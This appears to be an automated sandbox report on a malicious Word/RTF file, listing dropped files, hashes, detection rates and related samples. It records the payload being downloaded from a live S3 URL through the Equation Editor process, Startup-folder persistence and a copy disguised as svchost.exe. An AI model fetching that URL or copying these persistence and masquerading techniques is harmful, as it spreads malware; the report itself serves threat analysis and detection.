C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe | PO5421-allignright.doc | malicious
 | lsqtIv1jRK.exe | malicious
 | 04052021paymentscancopy.doc | malicious

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:downloaded
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Virustotal, Detection: 41%
• Antivirus: Metadefender, Detection: 19%
• Antivirus: ReversingLabs, Detection: 45%
Joe Sandbox View:
• Filename: PO5421-allignright.doc, Detection: malicious
• Filename: lsqtIv1jRK.exe, Detection: malicious
• Filename: 04052021paymentscancopy.doc, Detection: malicious
                                                  IE Cache URL:http://miolouno.s3-us-west-2.amazonaws.com/mad.exe
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{08186652-BACB-4000-A55F-0BCBA7498F21}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1536
                                                  Entropy (8bit):1.3539040104691664
                                                  Encrypted:false
                                                  SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbg:IiiiiiiiiifdLloZQc8++lsJe1Mzv
                                                  MD5:F6F80D0BE464ED6C743C599B4F12385A
                                                  SHA1:0CF4030CC325956908EFA90CD1373A2868568127
                                                  SHA-256:520A9042C743B61A0779F861EE3834C35F05788DE16B75553B783CF806ACF8EB
                                                  SHA-512:F53D7E037981669FB252F430393AC3AD3377F918969FF92DDBC89B6C5910C6000D3FEEF2F21D2DCBBB6D4ADB2D3B340FE3783F1A58C47CC86E8B3DB021C68878
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{784A4D1B-DE8E-4300-98F0-AE5841A8170E}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1024
                                                  Entropy (8bit):0.05390218305374581
                                                  Encrypted:false
                                                  SSDEEP:3:ol3lYdn:4Wn
                                                  MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                  SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                  SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                  SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9A867ADF-3614-4635-BF44-6C9AC8D8FC42}.tmp
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):163588
                                                  Entropy (8bit):3.745470873702184
                                                  Encrypted:false
                                                  SSDEEP:3072:+aAP+8FK1tm7YjkaipdiykZDCMbo0niY+uuDQKDCT:+FP+8miY4XLkdCP99QKGT
                                                  MD5:22FA8C878B114CA89FCABF13B0A044A3
                                                  SHA1:B449173A1CF65240EE376FC7638E3DEFD60C756A
                                                  SHA-256:D5D2CC035B4B850137BCE5E195357E5979FA3BF0FDFC57BFB925A07DF8A0DA26
                                                  SHA-512:AB02781F60B00CAC23800F49C5AF1FAD2298CFF01FE79B22C5F5F9E3FC723BEB9B96A1232A1A7001E1E81437E4A7938AA137EB6E62B5F1EBBBE8D7CB42F1CB61
                                                  Malicious:false
                                                  C:\Users\user\AppData\Local\Temp\1048825.cvr
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:modified
                                                  Size (bytes):1576
                                                  Entropy (8bit):3.4417743183760896
                                                  Encrypted:false
                                                  SSDEEP:48:LAll/H56+Rpjx4KHtKFlnL99+xxxWRb0Ga2KO93/cwm6:LA//Z6+7is4L99+xxxmYGn/m6
                                                  MD5:3E4F2F6075550D074C558371CC9CC9BD
                                                  SHA1:016C582ED7753219CF8EB9B32DEFC0414D600A62
                                                  SHA-256:E751A1D686FD0F3A015350A5CDFD234A666CA7FD8A198CD4ACA11A7E32A0062D
                                                  SHA-512:3489647347CACB06C9D3B2B34FD8D8C38E77EB2AA374DFE0E4F9F0865A67FA14C365245428E517DFBA9C2DDA8BF81B1CB5DC902190FC56ADAEB6AFD078AA3AF1
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  • Antivirus: Virustotal, Detection: 41%
                                                  • Antivirus: Metadefender, Detection: 19%
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Joe Sandbox View:
                                                  • Filename: PO5421-allignright.doc, Detection: malicious
                                                  • Filename: lsqtIv1jRK.exe, Detection: malicious
                                                  • Filename: 04052021paymentscancopy.doc, Detection: malicious
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Allignright_companyprofile.LNK
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Wed May 5 02:30:36 2021, length=2960089, window=hide
                                                  Category:dropped
                                                  Size (bytes):2188
                                                  Entropy (8bit):4.590602032190979
                                                  Encrypted:false
                                                  SSDEEP:48:8o/XTFGq79iDn1sQh2o/XTFGq79iDn1sQ/:8o/XJGq7wn1sQh2o/XJGq7wn1sQ/
                                                  MD5:5BBBD72D10C21586DEE0CAD09ADD2B8D
                                                  SHA1:0760C3EB44A74A4F750A6C424CB4D8A04CD9EE9E
                                                  SHA-256:5A5F1A263529163165FC2CBD84E9B4548FBF329A5422EBE9EF1FC6AFC5DE4504
                                                  SHA-512:A2024E2E338C1B239C2ECB5B360246DF703C305F3F0B66C871796076079D6FAADBCEF1B3AEF04C0DDB0EE3F05126C11A78096B82170E5D0C3B08E82B4AF7DDE3
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):116
                                                  Entropy (8bit):4.657550098584195
                                                  Encrypted:false
                                                  SSDEEP:3:M1tybVKxAl8JJjbVKxAlmX1tybVKxAlv:MTyExAGVExA0yExA1
                                                  MD5:FA26198640628CEC6D776D7BB8A4A7EB
                                                  SHA1:080BF5E7446190648986780F4D9E666D74087362
                                                  SHA-256:A3B64602BA15FFB5E8DC508D21A6BEFB4BDBBEDD8CA5014794C05002FA8023EF
                                                  SHA-512:8B3C10ABFF4F2050A7CB86542F856DB4CEF253D79BDA0301F5608519742E5C8292A4216CC58D8383AF54C716E6E7C07F5DC12B45E4F9ABB2D34501748AAFC3D5
                                                  Malicious:false
                                                  Preview: [doc]..Allignright_companyprofile.LNK=0..Allignright_companyprofile.LNK=0..[doc]..Allignright_companyprofile.LNK=0..
                                                  C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.431160061181642
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                  MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                  SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                  SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                  SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):2
                                                  Entropy (8bit):1.0
                                                  Encrypted:false
                                                  SSDEEP:3:Qn:Qn
                                                  MD5:F3B25701FE362EC84616A93A45CE9998
                                                  SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                  SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                  SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                  Malicious:false
                                                  Preview: ..
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0B643QLK5ZML9R9E3HST.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\14LJSV38HUMSQNNUJ4FI.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4YKYB2VKZ9SALOEP6IHD.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\83F00AO61JO8JVBNZZNG.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\87BC13303IWXGUS4CPWO.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AX9LQTWXBI1OLIGT87K1.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G8WMKAIS4RP0UU7V5CJM.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KATDANGR9NGCXMK3FXBM.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KNRKHEKRLNGFHX3WL0DL.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KWITJSS33AUNENZNHP1F.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P6I517PCOBHL4J9OQ9E0.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VXTSKOASU3HTN9MNZWSX.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WPSOBZIDEVVPSMUD2QNK.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WW5Z4WAT6CR6JFY4TKYI.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YDKB60LKBB2QYZ2W32L3.temp
                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):8016
                                                  Entropy (8bit):3.5902227033865217
                                                  Encrypted:false
                                                  SSDEEP:96:chQCsMqwqvsqvJCwoGz8hQCsMqwqvsEHyqvJCworMz1YKrXHBZqHZlUVYIu:cy1oGz8ydHnorMz1htZqH1Iu
                                                  MD5:C970E462F29D5DDEDF82DEFB133A0967
                                                  SHA1:648D94B8484ECE2669D7932CD1958D6008157642
                                                  SHA-256:CDDCC4AA8055F80755FF7543F72EA7C4CD26C25653EEEA653CA609A0AEB53B37
                                                  SHA-512:372219D30807E850D34BEB6AD02824C77F57195BF986609D4069EA5F2F6BC7041321E0F6C48162C8E378FB8599390D5CD200372BE443967C4F61EDD8566AA80D
                                                  Malicious:false
                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe
                                                  Process:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Virustotal, Detection: 41%
• Antivirus: Metadefender, Detection: 19%
                                                  • Antivirus: ReversingLabs, Detection: 45%
                                                  Joe Sandbox View:
• Filename: PO5421-allignright.doc, Detection: malicious
• Filename: lsqtIv1jRK.exe, Detection: malicious
• Filename: 04052021paymentscancopy.doc, Detection: malicious
                                                  C:\Users\user\Desktop\~$lignright_companyprofile.doc
                                                  Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):162
                                                  Entropy (8bit):2.431160061181642
                                                  Encrypted:false
                                                  SSDEEP:3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
                                                  MD5:4A5DFFE330E8BBBF59615CB0C71B87BE
                                                  SHA1:7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
                                                  SHA-256:D28616DC54FDEF1FF5C5BA05A77F178B7E3304493BAF3F4407409F2C84F4F215
                                                  SHA-512:3AA160CB89F4D8393BCBF9FF4357FFE7AE00663F21F436D341FA4F5AD4AEDC737092985EB4A94A694A02780597C6375D1615908906A6CEC6D7AB616791B6285C
                                                  Malicious:false
                                                  C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe
                                                  Process:C:\Users\user\AppData\Roaming\CTF loader_es.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):3367424
                                                  Entropy (8bit):2.545995908897728
                                                  Encrypted:false
                                                  SSDEEP:6144:w8e+U7MvlCLjsAhi8QMtmeC2C2gffQSXmVEb2BQsP87Q/GQDRT8haxZICH4qxvtz:
                                                  MD5:D96F52FC8733D2F4A127BDC44D4CEB25
                                                  SHA1:E6A708BA1EC4BB5E0335D111C25A660E8D2E3059
                                                  SHA-256:FBF9AD4434424D18319916F523899A50C21535012A50D531ED30040F0B66970B
                                                  SHA-512:08B7F6176FD7906CA8A655DD3D635E105178FD7E4CF86A1397EB71FA913CB4A9630178E58BB9EB93B759399E138049AE3F6ABD5132AA1D5C574B610222F2AD4B
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 19%
                                                  • Antivirus: ReversingLabs, Detection: 45%

                                                  Static File Info

                                                  General

                                                  File type:Rich Text Format data, unknown version
                                                  Entropy (8bit):4.113991727574773
                                                  TrID:
                                                  • Rich Text Format (5005/1) 55.56%
                                                  • Rich Text Format (4004/1) 44.44%
                                                  File name:Allignright_companyprofile.doc
                                                  File size:2960089
                                                  MD5:5a0c6dd1f7bbc5272f2ced270e2d4d8a
                                                  SHA1:9f553e08793745277db8a0d3aa82a63b7526a28b
                                                  SHA256:fbc12470553e748b10dd0e1a15c6e28a1e777b626757349e46031f7e0608b8e6
